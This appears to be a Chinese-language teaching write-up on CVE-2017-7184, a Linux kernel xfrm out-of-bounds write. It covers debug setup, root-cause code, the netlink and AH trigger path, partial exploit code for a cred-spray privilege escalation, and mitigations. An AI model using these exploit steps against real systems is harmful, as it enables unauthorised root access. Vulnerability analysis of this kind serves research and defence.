Linux xfrm模块越界读写提权漏洞分析（CVE-2017-7184）教学文档<\/h1>

漏洞概述<\/h2>
CVE-2017-7184是Linux内核xfrm模块中的一个越界读写漏洞，存在于xfrm_replay_state_esn结构体的处理过程中。该漏洞允许本地攻击者通过精心构造的netlink消息和AH协议数据包，实现越界内存读写，最终可能导致权限提升。<\/p>

漏洞环境搭建<\/h2>

调试环境配置<\/h3>

调试机(Debugging)配置<\/strong>：<\/p>

安装带符号表的vmlinux：<\/li> <\/ul>
codename=<\/span>$(<\/span>lsb_release -c | awk '{print $2}'<\/span>)<\/span> <\/span><\/span>sudo tee \/etc\/apt\/sources.list.d\/ddebs.list << EOF <\/span><\/span><\/span>deb http:\/\/ddebs.ubuntu.com\/ ${codename} main restricted universe multiverse <\/span><\/span><\/span>deb http:\/\/ddebs.ubuntu.com\/ ${codename}-security main restricted universe multiverse <\/span><\/span><\/span>deb http:\/\/ddebs.ubuntu.com\/ ${codename}-updates main restricted universe multiverse <\/span><\/span><\/span>deb http:\/\/ddebs.ubuntu.com\/ ${codename}-proposed main restricted universe multiverse <\/span><\/span><\/span>EOF<\/span> <\/span><\/span>wget -O - http:\/\/ddebs.ubuntu.com\/dbgsym-release-key.asc | sudo apt-key add - <\/span><\/span>sudo apt-get update <\/span><\/span>sudo apt-get install linux-image-4.4.0-21-generic-dbgsym <\/span><\/span><\/code><\/pre><\/li> 被调试机(Debuggee)配置<\/strong>：<\/p> 编辑\/etc\/grub.d\/40_custom添加KGDB启动项<\/li> 配置串口通信<\/li> <\/ul> <\/li> <\/ol> 双机调试脚本<\/h3> gdb \ <\/span><\/span><\/span><\/span> -ex "add-auto-load-safe-path <\/span>$(<\/span>pwd)<\/span>"<\/span> \ <\/span><\/span><\/span><\/span> -ex "file \/usr\/lib\/debug\/boot\/vmlinux-4.4.0-21-generic"<\/span> \ <\/span><\/span><\/span><\/span> -ex 'set arch i386:x86-64:intel'<\/span> \ <\/span><\/span><\/span><\/span> -ex 'target remote \/dev\/ttyS0'<\/span> \ <\/span><\/span><\/span><\/span> -ex 'continue'<\/span> \ <\/span><\/span><\/span><\/span> -ex 'disconnect'<\/span> \ <\/span><\/span><\/span><\/span> -ex 'set arch i386:x86-64'<\/span> \ <\/span><\/span><\/span><\/span> -ex 'target remote \/dev\/ttyS0'<\/span> <\/span><\/span><\/code><\/pre>漏洞分析<\/h2> 关键数据结构<\/h3> xfrm_state结构体<\/strong>：<\/p> struct<\/span> xfrm_state { <\/span><\/span> \/\/ ...其他成员... <\/span><\/span><\/span><\/span> struct<\/span> xfrm_replay_state_esn *<\/span>replay_esn; <\/span><\/span> struct<\/span> xfrm_replay_state_esn *<\/span>preplay_esn; <\/span><\/span> const<\/span> struct<\/span> xfrm_replay *<\/span>repl; <\/span><\/span> \/\/ ...其他成员... <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> xfrm_replay_state_esn结构体<\/strong>：<\/p> struct<\/span> xfrm_replay_state_esn { <\/span><\/span> unsigned<\/span> int<\/span> bmp_len; <\/span><\/span> __u32 oseq; <\/span><\/span> __u32 seq; <\/span><\/span> __u32 oseq_hi; <\/span><\/span> __u32 seq_hi; <\/span><\/span> __u32 replay_window; <\/span><\/span> __u32 bmp[0<\/span>]; <\/span><\/span>}; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞根源<\/h3> 漏洞存在于xfrm_replay_advance_esn<\/code>函数中，当更新replay状态时，没有正确验证replay_window<\/code>参数，导致可以越界读写内存：<\/p> static<\/span> void<\/span> xfrm_replay_advance_esn<\/span>(struct<\/span> xfrm_state *<\/span>x, __be32 net_seq) { <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> if<\/span> (diff <<\/span> replay_esn-><\/span>replay_window) { <\/span><\/span> for<\/span> (i =<\/span> 1<\/span>; i <<\/span> diff; i++<\/span>) { <\/span><\/span> bitnr =<\/span> (pos +<\/span> i) %<\/span> replay_esn-><\/span>replay_window; <\/span><\/span> nr =<\/span> bitnr >><\/span> 5<\/span>; <\/span><\/span> bitnr =<\/span> bitnr &<\/span> 0x1F<\/span>; <\/span><\/span> replay_esn-><\/span>bmp[nr] &=<\/span> ~<\/span>(1U<\/span> <<<\/span> bitnr); \/\/ 越界写 <\/span><\/span><\/span><\/span> } <\/span><\/span> } else<\/span> { <\/span><\/span> nr =<\/span> (replay_esn-><\/span>replay_window -<\/span> 1<\/span>) >><\/span> 5<\/span>; <\/span><\/span> for<\/span> (i =<\/span> 0<\/span>; i <=<\/span> nr; i++<\/span>) <\/span><\/span> replay_esn-><\/span>bmp[i] =<\/span> 0<\/span>; \/\/ 越界写 <\/span><\/span><\/span><\/span> } <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> replay_esn-><\/span>bmp[nr] |=<\/span> (1U<\/span> <<<\/span> bitnr); \/\/ 越界写 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞触发路径<\/h3> 通过netlink的XFRM_MSG_NEWSA<\/code>消息创建xfrm_state<\/li> 通过XFRM_MSG_NEWAE<\/code>消息修改replay_esn参数<\/li> 发送特制的AH协议数据包触发漏洞<\/li> <\/ol> 漏洞利用<\/h2> 利用思路<\/h3> 内存布局控制<\/strong>：<\/p> 通过设置bmp_len<\/code>使xfrm_replay_state_esn<\/code>结构体大小为192字节以内<\/li> 利用fork喷射大量cred结构体，使其与漏洞结构体相邻<\/li> <\/ul> <\/li> 权限提升<\/strong>：<\/p> 利用越界写将相邻cred结构体中的uid\/gid等字段置零<\/li> 通过反弹shell获取root权限<\/li> <\/ul> <\/li> <\/ol> 利用代码关键部分<\/h3> 设置sandbox绕过权限限制<\/strong>：<\/li> <\/ol> void<\/span> setup_sandbox<\/span>() { <\/span><\/span> int<\/span> real_uid =<\/span> getuid(); <\/span><\/span> int<\/span> real_gid =<\/span> getgid(); <\/span><\/span> <\/span><\/span> if<\/span> (unshare(CLONE_NEWUSER) !=<\/span> 0<\/span>) { <\/span><\/span> perror("[-] unshare(CLONE_NEWUSER)"<\/span>); <\/span><\/span> exit(EXIT_FAILURE); <\/span><\/span> } <\/span><\/span> <\/span><\/span> if<\/span> (unshare(CLONE_NEWNET) !=<\/span> 0<\/span>) { <\/span><\/span> perror("[-] unshare(CLONE_NEWUSER)"<\/span>); <\/span><\/span> exit(EXIT_FAILURE); <\/span><\/span> } <\/span><\/span> <\/span><\/span> if<\/span> (!<\/span>write_file("\/proc\/self\/setgroups"<\/span>, "deny"<\/span>)) { <\/span><\/span> perror("[-] write_file(\/proc\/self\/set_groups)"<\/span>); <\/span><\/span> exit(EXIT_FAILURE); <\/span><\/span> } <\/span><\/span> if<\/span> (!<\/span>write_file("\/proc\/self\/uid_map"<\/span>, "0 %d 1<\/span>\n<\/span>"<\/span>, real_uid)){ <\/span><\/span> perror("[-] write_file(\/proc\/self\/uid_map)"<\/span>); <\/span><\/span> exit(EXIT_FAILURE); <\/span><\/span> } <\/span><\/span> if<\/span> (!<\/span>write_file("\/proc\/self\/gid_map"<\/span>, "0 %d 1<\/span>\n<\/span>"<\/span>, real_gid)) { <\/span><\/span> perror("[-] write_file(\/proc\/self\/gid_map)"<\/span>); <\/span><\/span> exit(EXIT_FAILURE); <\/span><\/span> } <\/span><\/span> \/\/ ...其他设置... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre> 构造恶意SA<\/strong>：<\/li> <\/ol> int<\/span> xfrm_add_sa<\/span>(int<\/span> sock,int<\/span> spi,int<\/span> bmp_len) { <\/span><\/span> \/\/ ...初始化消息头... <\/span><\/span><\/span><\/span> struct<\/span> xfrm_usersa_info xui; <\/span><\/span> memset(&<\/span>xui,0<\/span>,sizeof<\/span>(xui)); <\/span><\/span> xui.family =<\/span> AF_INET; <\/span><\/span> xui.id.proto =<\/span> IPPROTO_AH; <\/span><\/span> xui.id.spi =<\/span> spi; <\/span><\/span> xui.id.daddr.a4 =<\/span> inet_addr("127.0.0.1"<\/span>); <\/span><\/span> xui.lft.hard_byte_limit =<\/span> 0x10000000<\/span>; <\/span><\/span> xui.lft.hard_packet_limit =<\/span> 0x10000000<\/span>; <\/span><\/span> xui.lft.soft_byte_limit =<\/span> 0x1000<\/span>; <\/span><\/span> xui.lft.soft_packet_limit =<\/span> 0x1000<\/span>; <\/span><\/span> xui.mode =<\/span> XFRM_MODE_TRANSPORT; <\/span><\/span> xui.flags =<\/span> XFRM_STATE_ESN; <\/span><\/span> memcpy(data,&<\/span>xui,sizeof<\/span>(xui)); <\/span><\/span> <\/span><\/span> \/\/ ...添加其他必要属性... <\/span><\/span><\/span><\/span> struct<\/span> xfrm_replay_state_esn rs; <\/span><\/span> memset(&<\/span>nla, 0<\/span>, sizeof<\/span>(nla)); <\/span><\/span> nla.nla_len =<\/span> sizeof<\/span>(nla)+<\/span>sizeof<\/span>(rs) +<\/span>bmp_len*<\/span>8<\/span>*<\/span>4<\/span>; <\/span><\/span> nla.nla_type =<\/span> XFRMA_REPLAY_ESN_VAL; <\/span><\/span> rs.replay_window =<\/span> bmp_len; <\/span><\/span> rs.bmp_len =<\/span> bmp_len; <\/span><\/span> memcpy(data,&<\/span>nla,sizeof<\/span>(nla)); <\/span><\/span> data +=<\/span> sizeof<\/span>(nla); <\/span><\/span> memcpy(data, &<\/span>rs, sizeof<\/span>(rs)); <\/span><\/span> data +=<\/span> sizeof<\/span>(rs); <\/span><\/span> memset(data,'1'<\/span>,bmp_len*<\/span>4<\/span>*<\/span>8<\/span>); <\/span><\/span> \/\/ ...发送消息... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre> 修改SA参数触发漏洞<\/strong>：<\/li> <\/ol> int<\/span> xfrm_new_ae<\/span>(int<\/span> sock,int<\/span> spi,int<\/span> bmp_len,int<\/span> evil_windows,int<\/span> seq,int<\/span> seq_hi) { <\/span><\/span> \/\/ ...初始化消息头... <\/span><\/span><\/span><\/span> struct<\/span> xfrm_aevent_id xai; <\/span><\/span> memset(&<\/span>xai,0<\/span>,sizeof<\/span>(xai)); <\/span><\/span> xai.sa_id.proto =<\/span> IPPROTO_AH; <\/span><\/span> xai.sa_id.family =<\/span> AF_INET; <\/span><\/span> xai.sa_id.spi =<\/span> spi; <\/span><\/span> xai.sa_id.daddr.a4 =<\/span> inet_addr("127.0.0.1"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ ...设置恶意参数... <\/span><\/span><\/span><\/span> struct<\/span> xfrm_replay_state_esn rs; <\/span><\/span> memset(&<\/span>nla, 0<\/span>, sizeof<\/span>(nla)); <\/span><\/span> nla.nla_len =<\/span> sizeof<\/span>(nla)+<\/span>sizeof<\/span>(rs) +<\/span>bmp_len*<\/span>8<\/span>*<\/span>4<\/span>; <\/span><\/span> nla.nla_type =<\/span> XFRMA_REPLAY_ESN_VAL; <\/span><\/span> rs.replay_window =<\/span> evil_windows; \/\/ 关键恶意参数 <\/span><\/span><\/span><\/span> rs.bmp_len =<\/span> bmp_len; <\/span><\/span> rs.seq_hi =<\/span> seq_hi; <\/span><\/span> rs.seq =<\/span> seq; <\/span><\/span> \/\/ ...发送消息... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre> 发送触发包<\/strong>：<\/li> <\/ol> int<\/span> sendah<\/span>(int<\/span> sock,int<\/span> spi,int<\/span> seq ) { <\/span><\/span> struct<\/span> sockaddr_in sai; <\/span><\/span> struct<\/span> ip_auth_hdr ah; <\/span><\/span> \/\/ ...初始化... <\/span><\/span><\/span><\/span> ah.spi =<\/span> spi; <\/span><\/span> ah.nexthdr =<\/span> 1<\/span>; <\/span><\/span> ah.seq_no =<\/span> seq; <\/span><\/span> ah.hdrlen =<\/span> (0x10<\/span> >><\/span> 2<\/span>) -<\/span> 2<\/span>; <\/span><\/span> \/\/ ...发送数据包... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>防护措施<\/h2> 更新到修复该漏洞的内核版本<\/li> 限制非特权用户使用netlink套接字<\/li> 启用内核地址空间布局随机化(KASLR)<\/li> 启用SMAP\/SMEP保护<\/li> <\/ol> 参考资源<\/h2> Linux内核源码：https:\/\/elixir.bootlin.com\/linux\/v4.10.6\/source\/net\/xfrm<\/li> Netlink编程指南：http:\/\/www.man7.org\/linux\/man-pages\/man7\/netlink.7.html<\/li> 双机调试教程：http:\/\/blog.chinaunix.net\/uid-26675482-id-3255770.html<\/li> <\/ol> 本教学文档详细分析了CVE-2017-7184漏洞的技术细节和利用方法，仅供安全研究和防御参考。请勿用于非法用途。<\/p>